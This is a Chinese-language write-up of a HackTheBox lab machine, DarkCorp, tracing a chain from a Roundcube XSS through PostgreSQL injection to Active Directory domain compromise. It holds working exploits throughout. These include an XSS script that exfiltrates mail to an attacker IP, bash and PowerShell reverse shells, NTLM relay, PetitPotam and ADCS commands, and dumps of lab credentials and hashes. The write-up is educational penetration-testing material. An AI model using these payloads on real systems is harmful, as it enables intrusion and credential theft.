基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.54
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 13:30 CST
Nmap scan report for 10.10.11.54
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_  256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.27 seconds

80

需要加hosts:

1
10.10.11.54 drip.htb

是DripMail,根据页面信息知道用的是Roundcube:

Roundcube Webmail

注册登录,登录是mail子域名也加hosts,可以看到是Roundcube Webmail 1.6.7:

搜索可以发现相关漏洞:

contact

是一个XSS漏洞,也就是需要有人阅读邮件才会触发,我们现在有邮箱账号但并没有收件人信息,回到主站,contact us那里可以发邮件,应该会有bot自动查看:

这里发送的recipient是support,可以修改为我们自己的邮箱,然后可以看到自动附加的邮件签名:

bcase xss

现在得到了目标用户应该是bcase,那就是xss部分了,还是contact那里发邮件,把recipient修改为bcase,并且可以看到content是text,改成html,payload url编码:

1
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.8:7777/?c='+document.cookie})) foo=bar">Foo</body>

可以看到callback,但因为cookie是http only,所以没那么简单

oswe time

接下来就是oswe时间了,和课程模块Atmail Mail Server Appliance: from XSS to RCE里的案例很像,只是这个是http only,XSS读邮件,在id为2的邮件中发现Analytics dashboard,并且其中提到需要重置密码才能登录:

1
dev-a3f1-01.drip.htb

dev-a3f1-01.drip.htb

所以就是请求重置密码,xss读取邮件得到reset link,重置后登录

mail_xss.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
import base64
import threading
from lxml import html


# Configuration
TARGET_URL = 'http://drip.htb/contact'
LISTEN_PORT = 7777
LISTEN_IP = '0.0.0.0'

# Payload for the POST request
start_mesg = '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch(\'/?_task=mail&_action=show&_uid='
message = 3
end_mesg = '&_mbox=INBOX&_extwin=1\').then(r=>r.text()).then(t=>fetch(`http://10.10.14.8:7777/c=${btoa(t)}`)) foo=bar">Foo</body>'

post_data = {
    'name': 'miao',
    'email': 'miao',
    'message': f"{start_mesg}{message}{end_mesg}",
    'content': 'html',
    'recipient': 'bcase@drip.htb'
}
print(f"{start_mesg}{message}{end_mesg}")

# Headers for the POST request
headers = {
    'Host': 'drip.htb',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'http://drip.htb',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Referer': 'http://drip.htb/index',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': 'session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNGFhNWFlNjRmMmQ4YWJkNTFjN2U4ZWEyODhmNjdiNzQ2MmIyNjY0YSJ9.Z6mM1Q.SGDZnbTJ7f5miJxHruNLwjD_fhI',
    'Connection': 'close'
}

# Function to send the POST request
def send_post():
    response = requests.post(TARGET_URL, data=post_data, headers=headers)
    print(f"[+] POST Request Sent! Status Code: {response.status_code}")

# Custom HTTP request handler to capture and decode the incoming data
class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if '/c=' in self.path:
            encoded_data = self.path.split('/c=')[1]
            decoded_data = base64.b64decode(encoded_data).decode('latin-1')
            # print(f"[+] Received data {decoded_data}")
            tree = html.fromstring(decoded_data)

            # XPath query to find the div with id 'messagebody'
            message_body = tree.xpath('//div[@id="messagebody"]')
           
            # Check if the div exists and extract the content
            if message_body:
                # Extract inner text, preserving line breaks
                message_text = message_body[0].text_content().strip()
                print("[+] Extracted Message Body Content:\n")
                print(message_text)
            else:
                print("[!] No div with id 'messagebody' found.")

        else:
            print("[!] Received request but no data found.")

        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'OK')

    def log_message(self, format, *args):
        return  # Suppress default logging

# Function to start the HTTP server
def start_server():
    server_address = (LISTEN_IP, LISTEN_PORT)
    httpd = HTTPServer(server_address, RequestHandler)
    print(f"[+] Listening on port {LISTEN_PORT} for exfiltrated data...")
    httpd.serve_forever()

# Run the HTTP server in a separate thread
server_thread = threading.Thread(target=start_server)
server_thread.daemon = True
server_thread.start()

# Send the POST request
send_post()

# Keep the main thread alive to continue listening
try:
    while True:
        pass
except KeyboardInterrupt:
    print("\n[+] Stopping server.")

dev-a3f1-01

测试搜索功能,随意输入得到报错,可以看到sql语句使用了我们的输入,可能存在sql注入:

sql注入

验证存在注入,并且可以识别出是PostgreSQL:

1
2
3
4
'aaa' or 1=1
'aaa' or 1=2

'aaa';SELECT version()--

并且可以直接使用一些pg函数:

1
''; SELECT pg_read_file('/etc/passwd', 0, 1000);

sql to rce

pg可以直接执行命令,存在一些过滤,编码绕回即可:

1
2
3
4
5
6
7
'';DO $$
DECLARE
    c text;
BEGIN
    c := CHR(67) || CHR(79) || CHR(80) || CHR(89) || ' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.8/4444 0>&1"''';
    EXECUTE c;
END $$;

打到postgres shell:

postgres

常规翻文件,在dashboard的env里得到数据库账号密码:

1
2
3
4
5
6
7
8
postgres@drip:/var/www/html/dashboard$ cat .env

DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

另外在backups里发现postgres相关的gpg加密备份:

gpg

gpg解密,密码就是DB_PASS:

1
2
3
4
5
6
7
script /dev/null -c bash

gpg --use-agent --homedir /var/lib/postgresql/.gnupg --pinentry-mode=loopback  --passphrase 2Qa2SsBkQvsc --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg  > dev-dripmail.old.sql

1	bcase	dc5484871bc95c4eab58032884be7225	bcase@drip.htb
2   victor.r    cac1c7b0e7008d67b6db40c03e76b9c0    victor.r@drip.htb
3   ebelford    8bbd7f88841b4223ae63c8848969be86    ebelford@drip.htb

sql中得到一些hash,可以解出victor.r和ebelford的密码

1
2
3
4
5
6
1	bcase	dc5484871bc95c4eab58032884be7225	bcase@drip.htb
2   victor.r    cac1c7b0e7008d67b6db40c03e76b9c0    victor.r@drip.htb
3   ebelford    8bbd7f88841b4223ae63c8848969be86    ebelford@drip.htb

victor.r victor1gustavo@#
ebelford ThePlague61780

ebelford

得到的ebelford账号密码ssh登录:

查看hosts可以看到内网的域环境:

1
2
172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb

打通隧道,添加hosts,可以发现前面得到的另一组账号密码是有效域用户:

1
2
3
4
5
6
7
ssh ebelford@10.10.11.54 -D 1080

proxychains4 netexec smb DC-01.darkcorp.htb -u victor.r -p 'victor1gustavo@#'

# sshuttle直接打通也可以,但本地遇到bug,mac运行后没添加route,需要刷新防火墙规则,kali里正常
sudo pfctl -f /etc/pf.conf
sshuttle -v -r ebelford@10.10.11.54 172.16.20.1/24

bloodhound

收集bloodhound数据分析,但失败,先收集常规users:

1
2
3
4
5
faketime -f "-16m" bloodhound-python -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -ns 172.16.20.1 --dns-tcp -c All --zip

nxc smb 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --users

nxc ldap 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --bloodhound --collection All

users

1
2
3
4
5
6
7
8
9
10
11
12
Administrator
Guest
krbtgt
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
taylor.b.adm
eugene.b
bryce.c

内网端口扫描

对发现的两个内网机器进行探测,直接传静态nmap上去更稳定:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
wget http://10.10.14.8:7777/nmap-7.91SVN-x86_64-portable.tar.gz
tar -xf nmap-7.91SVN-x86_64-portable.tar.gz

./run-nmap.sh -sC -sV 172.16.20.1 172.16.20.2

Starting Nmap 7.91SVN ( https://nmap.org ) at 2025-02-10 18:48 MST
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.00091s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_  256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-11 01:48:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after:  2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=DARKCORP-DC-01-CA
| Not valid before: 2024-12-29T23:24:10
|_Not valid after:  2034-12-29T23:34:10
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after:  2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after:  2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC-01.darkcorp.htb, DNS:darkcorp.htb, DNS:darkcorp
| Not valid before: 2025-01-22T12:09:55
|_Not valid after:  2124-12-29T12:09:55
|_ssl-date: 2025-02-11T01:49:57+00:00; 0s from scanner time.
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC-01, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:84:03:00 (Microsoft)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-02-11T01:49:17
|_  start_date: N/A

Nmap scan report for 172.16.20.2
Host is up (0.0026s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5000/tcp open  http          Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info:
|   Target_Name: darkcorp
|   NetBIOS_Domain_Name: darkcorp
|   NetBIOS_Computer_Name: WEB-01
|   DNS_Domain_Name: darkcorp.htb
|   DNS_Computer_Name: WEB-01.darkcorp.htb
|   DNS_Tree_Name: darkcorp.htb
|_  Product_Version: 10.0.20348
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WEB-01, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:84:03:03 (Microsoft)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-02-11T01:49:18
|_  start_date: N/A

Post-scan script results:
| clock-skew:
|   0s:
|     172.16.20.1 (DC-01)
|_    172.16.20.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 90.78 seconds

20.1

20.1的80就是主站,443是IIS默认页面:

20.2

20.2的80是IIS默认页面,5000需要登录:

Internal Status Monitor

victor.r可以登录20.2的5000端口,因为是域用户,需要配置burp ntlm认证:

1
victor.r victor1gustavo@#

check

然后有个check功能,但对host有校验,不能直接修改为我们的ip:

但可以发现对端口并没有限制:

(这里也有个非预期的命令注入)

svc_acc

所以接下来就类似Mist机器了,转发端口,再次check,发现是svc_acc:

1
2
3
wget http://10.10.14.8:7777/socatx64.bin

./socatx64.bin tcp-listen:8088,reuseaddr,fork tcp:10.10.14.8:80

破解不出来,接下来尝试relay,ldap交互shell,但并不能直接shadow creds。但可以看到svc_acc是dns admin:

1
2
3
python3 examples/ntlmrelayx.py -t ldap://dc-01.darkcorp.htb -i

# get_user_groups svc_acc

Relay time

整理信息,现在我们可以进行relay,并且是dns admin,那就可以通过relay添加dns,搜索可以发现用到dns的relay方式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# relay添加dns
python3 examples/ntlmrelayx.py -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.5

# 设置relay请求web01证书
python3 krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB01$'

# 强制web01访问我们添加的dns
python3 PetitPotam.py -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01

# web-01证书认证
faketime -f "-16m" python3 ~/Tools/ADCS_Tools/PKINITtools/gettgtpkinit.py -cert-pfx 'WEB01$.pfx' 'DARKCORP.HTB/WEB-01$' WEB01.ccache
export KRB5CCNAME=./WEB01.ccache
faketime -f "-16m" python3 ~/Tools/ADCS_Tools/PKINITtools/getnthash.py -key 78ef10df6a887e91e43253bbd81c4c665c405473df6167713106a6aaec14b9aa 'darkcorp.htb/WEB-01$'

Recovered NT Hash
8f33c7fc7ff515c1f358e488fbb8b675

非预期

同样的relay方式也可以直接得到DC,非预期

web-01 & user flag

得到web-01机器hash后就是常规s4uself了:

1
2
3
4
5
6
7
8
9
10
11
# 获取sid
nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid

S-1-5-21-3432610366-2163336488-3604236847

# 生成web-01 ticket
faketime -f "-16m" python3 examples/ticketer.py -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator

# 使用ticket认证登录
export KRB5CCNAME=./Administrator.ccache
faketime -f "-16m" python3 examples/wmiexec.py Administrator@web-01.darkcorp.htb -k -no-pass -debug

web-01 hashdump

1
2
3
4
5
6
faketime -f "-16m" python3 examples/secretsdump.py Administrator@web-01.darkcorp.htb -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

web-01 dpapi

dpapi可以得到web01的本地管理员密码

1
2
3
nxc smb web-01.darkcorp.htb -u Administrator -H 88d84ec08dad123eb04a060a74053f21 --local-auth --dpapi

SMB         172.16.20.2     445    WEB-01           [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!

这个不完整,需要机器上确认,sharpdpapi可以看到一个加密的文件无法自动找到master key,需要手动处理:

参考vintage里dpapi的离线处理方式,得到另一个密码:

1
2
3
4
5
6
7
8
9
32B2774DF751FF7E28E78AE75C237A1E
6037d071-cac5-481e-9e08-c4296c0a7ff7


python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 6037d071-cac5-481e-9e08-c4296c0a7ff7 -sid S-1-5-21-2988385993-1727309239-2541228647-500  -password 'But_Lying_Aid9!'   
python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file 32B2774DF751FF7E28E78AE75C237A1E -key 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da

Username    : Administrator
Unknown     : Pack_Beneath_Solid9!

john.w

使用得到的密码喷洒,发现john.w复用这个密码:

1
2
3
nxc ldap 172.16.20.1 -u users.txt -p 'Pack_Beneath_Solid9!'  --continue-on-success

LDAP        172.16.20.1     389    DC-01            [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!

angela.w

john.w对angela.w有GenericWrite,所以直接shadow ceds:

1
2
3
faketime -f "-16m" certipy shadow auto -u john.w@darkcorp.htb -p 'Pack_Beneath_Solid9!' -dc-ip 172.16.20.1 -ns 172.16.20.1 -target dc-01.darkcorp.htb -account angela.w

[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a

Linux_Admins

angela.w的管理员账号angela.w.adm是Linux_Admins成员,linux使用kerberos认证一般是sssd GSSAPI:

所以就是通过john.w修改angela.w的upn,然后生成票据登录Linux:

1
2
3
4
5
$ python3 powerview.py john.w:'Pack_Beneath_Solid9!'@darkcorp.htb

PV > Set-DomainObject -Identity angela.w -Set userPrincipalName=angela.w.adm

faketime -f "-16m" python3 examples/getTGT.py darkcorp.htb/angela.w.adm -hashes :957246c8137069bca672dc6aa0af7c7a -principalType NT_ENTERPRISE

angela.w.adm

之后使用ticket登录linux:

1
2
3
4
export KRB5CCNAME=./angela.w.adm.ccache

# 快速操作,提示要密码就重做一遍前面的修改upn流程
ssh -K angela.w.adm@drip.darkcorp.htb

/etc/krb5.conf

修改本地kerberos配置文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[libdefaults]
        default_realm = DARKCORP.HTB
        dns_lookup_realm = true
        dns_lookup_kdc = true

[realms]
        DARKCORP.HTB = {
                kdc = darkcorp.htb
                admin_server = darkcorp.htb
        }

[domain_realm]
        .darkcorp.htb = DARKCORP.HTB
        darkcorp.htb = DARKCORP.HTB

sssd

得到了使用sshd的Linux root,搜索可以找到:

1
2
3
4
5
6
ls -la /var/lib/sss/
ls -la /var/lib/sss/db
strings /var/lib/sss/db/*.ldb | grep '\$6\$'

$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.

得到了hash,可以破解出另一个linux admin用户taylor.b.adm密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

!QAZzaq1

taylor.b.adm to root

(最快到这一步的方式是得到初步Linux后直接爆破taylor.b.adm的密码,非预期方式)

taylor.b.adm在remote manage组中,可以winrm登录

1
2
taylor.b.adm !QAZzaq1
evil-winrm -i 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1'

并且是gpo_manager成员,所以下一步很明显是GPO:

gpo abuse

常规gpo abuse,有杀软,所以远程用pygpoabuse:

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> Get-GPO -All

SecurityUpdates
652cae9a-4bb7-49f2-9e52-3361f33ce786

python3 pygpoabuse.py darkcorp.htb/taylor.b.adm:'!QAZzaq1' -dc-ip 172.16.20.1 -gpo-id "652CAE9A-4BB7-49F2-9E52-3361F33CE786" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "miao"

# 刷新执行
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> gpupdate /force

得到 DC system:

root flag

直接添加用户到域管,然后dump:

1
2
3
ps> net group "Domain Admins" taylor.b.adm /add

python3 examples/secretsdump.py taylor.b.adm:'!QAZzaq1'@172.16.20.1 -just-dc-user Administrator

之后使用Administrator hash登录:

1
evil-winrm -i 172.16.20.1 -u Administrator -H fcb3ca5a19a1ccf2d14c13e8b64cde0f

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
python3 examples/secretsdump.py taylor.b.adm:'!QAZzaq1'@172.16.20.1 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c032c3e2657f4554bc7af108bd5ef17:::
victor.r:1103:aad3b435b51404eeaad3b435b51404ee:06207752633f7509f8e2e0d82e838699:::
svc_acc:1104:aad3b435b51404eeaad3b435b51404ee:01f55ea10774cce781a1b172478fcd25:::
john.w:1105:aad3b435b51404eeaad3b435b51404ee:b31090fdd33a4044cd815558c4d05b04:::
angela.w:1106:aad3b435b51404eeaad3b435b51404ee:957246c8137069bca672dc6aa0af7c7a:::
angela.w.adm:1107:aad3b435b51404eeaad3b435b51404ee:cf8b05d0462fc44eb783e3f423e2a138:::
taylor.b:1108:aad3b435b51404eeaad3b435b51404ee:ab32e2ad1f05dab03ee4b4d61fcb84ab:::
taylor.b.adm:14101:aad3b435b51404eeaad3b435b51404ee:0577b4b3fb172659dbac0be4554610f8:::
darkcorp.htb\eugene.b:25601:aad3b435b51404eeaad3b435b51404ee:84d9acc39d242f951f136a433328cf83:::
darkcorp.htb\bryce.c:25603:aad3b435b51404eeaad3b435b51404ee:5aa8484c54101e32418a533ad956ca60:::
DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:45d397447e9d8a8c181655c27ef31d28:::
DRIP$:1601:aad3b435b51404eeaad3b435b51404ee:fa133329576858e48f4e1a8de10d7f56:::
WEB-01$:20601:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::

参考资料